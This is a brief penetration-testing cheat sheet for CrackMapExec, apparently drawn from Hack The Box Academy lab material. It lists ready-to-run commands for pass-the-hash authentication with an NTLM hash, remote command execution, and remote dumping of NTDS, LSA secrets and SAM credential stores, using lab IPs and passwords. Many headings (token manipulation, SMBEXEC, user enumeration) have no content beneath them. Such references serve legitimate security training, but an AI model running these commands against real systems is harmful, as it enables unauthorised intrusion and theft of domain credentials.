Crackmapexec
CrackMapExec
Basic Usage
Using NTLM hash to authenticate and list shares
crackmapexec smb 192.168.1.100 -u Administrator -H aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 --sharesExecute commands with hash
crackmapexec smb 192.168.1.100 -u Administrator -H aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 -x whoamiCommon Operations
Capturing the NTDS
crackmapexec smb 10.129.201.57 -u bwilliamson -p P@55w0rd! --ntdsDumping LSA Secrets Remotely
crackmapexec smb 10.129.42.198 --local-auth -u bob -p HTB_@cademy_stdnt! --lsaDumping SAM Remotely
crackmapexec smb 10.129.42.198 --local-auth -u bob -p HTB_@cademy_stdnt! --samToken Manipulation
Using the tokens module
Impersonating a user
Command Execution
SMBEXEC Method
User Enumeration
Enumerating Logged-on Users
Advanced Techniques
Pass-the-Hash (PtH)
Getting Password Policies
Enumerating Domain Users
Using Valid Credentials to Enumerate Users
Tips
Last updated